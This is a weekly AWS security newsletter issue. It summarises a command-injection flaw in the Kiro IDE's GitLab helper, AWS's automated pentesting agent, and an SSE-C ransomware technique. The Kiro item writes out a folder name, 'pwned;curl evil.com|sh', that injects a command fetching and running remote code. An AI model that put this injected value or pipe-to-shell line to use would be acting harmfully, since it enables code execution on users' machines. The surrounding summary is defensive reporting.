Monday,
January 12, 2026

🥖 Palate Cleanser

I'm a sucker for industry drama. Orca and Wiz kissed and made up after the Patent Board declared Orca's agentless scanning patents "obvious" - which, ironically, is what everyone else thought about this lawsuit from the start. Both sides walk away paying their own legal bills and promising never to speak of this again.

I missed this last week, and it's not AWS-related, but it's too good not to mention. Google Cloud's Application Integration let anyone send emails from a legit Google address (noreply-application-integration@google.com), and attackers used it to phish 3,200 orgs with emails that bypass spam filters because they're technically real Google emails. The clouds are fun.

Have feedback about AWS Security Digest? Tell us here. This issue is also available to share online.

📋 Chef's selections

  • (CVE-2026-0830) AWS Kiro GitLab Helper RCE by Dhiraj Mishra

    Kiro, AWS's AI-powered IDE, has a GitLab MR helper that builds shell commands like `cd ${workingDir}; git branch` and passes them straight to `child_process.exec` without quoting the path. Clone a repo into a folder named `pwned;curl evil.com|sh`, open it in Kiro, and you've got arbitrary code execution before git even runs. Fixed in 0.6.18, but a textbook reminder that string interpolation into shell commands is the vulnerability that refuses to die.

  • AWS Security Agent - Penetration Testing Overview by Sena Yakut

    AWS Security Agent, announced at re:Invent 2025, is AWS's automated "+1 teammate" for pentesting - handling Design Review, Code Review, and active Penetration Testing against your apps. Sena demos it against DVWA (the intentionally vulnerable test app) running on EC2 to show what the agent catches. It won't replace your pentesters, but it might give a "second pair of eyes" without the calendar negotiation.

  • AWS Ends SSE-C Encryption and a Ransomware Vector by Rich Mogull

    This was actually announced in November 2025. AWS is killing SSE-C (customer-provided encryption keys) in April 2026 after researchers found attackers could copy S3 objects, re-encrypt them with their own keys, and delete the originals - instant ransomware with just basic read/write permissions, no KMS needed. S3 never stores the customer-supplied key, so the victim has nothing left to decrypt with. Rich calls SSE-C "an odd duck" that predates proper key management and saw minimal legitimate use anyway. Use KMS with customer-managed keys or client-side encryption instead.

🥗 AWS security blogs

๐Ÿ› Reddit threads on r/aws


💸 Sponsor shoutout


Meet Pleri: your AI-powered cloud security teammate. She's not a chatbot. Pleri proactively finds meaningful security work and fixes issues before they become problems.

Learn more about Pleri and see her in action.


🤖 Dessert

Dessert is made by robots, for those who enjoy the industrial content.

🍧 IAM permission changes

🍪 API changes

🍹 IAM managed policy changes

☕ CloudFormation resource changes

    No resource updates this week.

🎮 Amazon Linux vulnerabilities

📺 AWS security bulletins

🚬 Security documentation changes
